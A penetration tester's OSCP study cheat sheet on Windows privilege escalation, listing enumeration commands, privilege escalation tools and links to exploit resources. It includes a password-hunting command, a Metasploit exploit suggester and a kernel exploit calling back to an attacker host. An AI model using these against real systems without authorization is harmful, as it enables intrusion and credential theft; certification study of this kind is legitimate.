Windows Privilege Escalation

There is a ton of great resources of privilege escalation techniques on Windows. However, I still want to create my own cheat sheet of this difficult topic along my OSCP journey as I didn’t know anything about Windows Internal :(. I recently bought 2 Udemy courses focusing on Windows PrivEsc: Windows Privilege Escalation for OSCP & Beyond! and Windows Privilege Escalation for Beginners. Both courses are awesome for OSCP students like me. Here I take notes and add more useful stuff I’ve collected based on their outlines and existing cheat sheets on that topic as well.

A - Initial Enumeration

1. System Enumeration

System information

> systeminfo
# Only ouputs important information
> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
> hostname

wmic: Windows Management Instrumentation Command-line

> wmic /?
# Quick Fix Engineering
> wmic qfe 
> wmic qfe get Caption,Description,HotFixID,InstalledOn
> wmic logicaldisk get Caption,Description,ProviderName

2. User Enumeration

> whoami
> whoami /priv
> whoami /groups

> net user
> net user administrator

> net localgroup
> net localgroup administrators

3. Network Enumeration

> ipconfig /all
> arp -a
> route print
> netstat -ano 

4. Password Hunting

> findstr /si password *.txt *.ini *.config

5. A/V and Firewall Enumeration

# Service Control
> sc query windefend
> sc queryex type= service

> netsh advfirewall firewall dump
> netsh firewall show state
> netsh firewall show config

B - Automated Tools

• winPEAS
• Windows Priv Esc Checklist
• Sherlock
• Watson
• PowerUp
• JAWS
• Windows Exploit Suggester
• Metasploit Local Exploit Suggester
• Seatbelt
• SharpUp

meterpreter> run post/multi/recon/local_exploit_suggester

C - Escalation Paths

1. Kernel Exploits

• https://github.com/SecWiki/windows-kernel-exploits

Writeups

• MS10-059: HTB - Devel

  > ms.exe $LHOST $LPORT
  

• MS15-051: HTB-Bastard
• COMahawk

2. Passwords and Port Forwarding

3. Windows Subsystem for Linux

4. Impersonation and Potato Attacks

Hot Potato

• https://foxglovesecurity.com/2016/01/16/hot-potato/

MS16-075 Rotten Potato

Juicy Potato

• https://ohpe.it/juicy-potato/
• https://ohpe.it/juicy-potato/CLSID/

Rogue Potato

• https://github.com/antonioCoco/RoguePotato

Writeups

• HTB-Jeeves: RottenPotato

5. getsystem

6. RunAs

7. Registry

8. Executable Files

9. Startup Applications

10. DLL Hijacking

https://pentestlab.blog/2017/03/27/dll-hijacking/

11. Service Permissions (Paths)

Binary Paths

Unquoted Service Paths

• part 1, part 2, part 3

12. CVE-2019-1388

Extra Resources

• https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html

• https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

• https://www.fuzzysecurity.com/tutorials/16.html

• https://tryhackme.com/room/windowsprivescarena

• https://guif.re/windowseop

• https://github.com/phackt/pentest/tree/master/privesc

• https://lolbas-project.github.io/#

• https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/

• https://github.com/frizb/Windows-Privilege-Escalation

• https://www.roguesecurity.in/2018/12/02/a-guide-for-windows-penetration-testing/

• LPE Workshop (docs, walkthrough)

• <https://vulndev.io/notes/2019/01/01/windows.html#general

• https://medium.com/@arnavtripathy98/windows-privilege-escalation-basics-1b52c24216ed

• https://github.com/frizb/Windows-Privilege-Escalation

• https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md

• https://github.com/vitalysim/Awesome-Hacking-Resources#privilege-escalation

  <!– #### 2. Insecure Service Permissions

• Download: https://xor.cat/2017/09/05/sysinternals-accesschk-accepteula/

accesschk.exe -uwcqv "Authenticated Users" * /accepteula

Bypassing UAC

https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ https://github.com/hfiref0x/UACME

3. Abusing Token Privileges

https://github.com/hatRiot/token-priv –>

Bonus: Linux Privilege Escalation

• First try history,cat .bash_history or some stupid passwords for a quick win

Resources

• https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
• https://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html
• https://payatu.com/guide-linux-privilege-escalation
• https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-5.md
• https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
• https://medium.com/@sushantkamble/windows-privilege-escalation-without-metasploit-9bad5fbb5666
• https://github.com/frizb/Linux-Privilege-Escalation/blob/master/README.md
• Linux Kernel Exploits
• https://percussiveelbow.github.io/linux-privesc/

• https://blog.mzfr.me/linux-priv-esc

• Wildcards: https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/, https://www.exploit-db.com/papers/33930